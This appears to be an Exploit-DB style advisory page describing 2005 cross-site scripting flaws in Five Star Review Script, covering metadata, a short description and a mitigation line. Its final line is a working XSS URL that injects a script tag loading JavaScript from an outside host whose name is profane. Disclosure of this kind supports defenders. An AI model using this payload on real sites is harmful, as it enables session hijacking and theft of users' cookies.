Five Star Review Script Multiple Input-Validation Vulnerabilities

vendor:

Five Star Review Script

by:

SecurityFocus

7.5

CVSS

HIGH

Multiple Input-Validation Vulnerabilities

CWE

Product Name: Five Star Review Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Five Star Review Script Multiple Input-Validation Vulnerabilities

Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to run arbitrary HTML and script code in the browser of a victim in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not allowed to be included in dynamic content.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18390/info

Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to run arbitrary HTML and script code in the browser of a victim in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.

http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id&#039;>">&#039;><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c57a8ca2d57d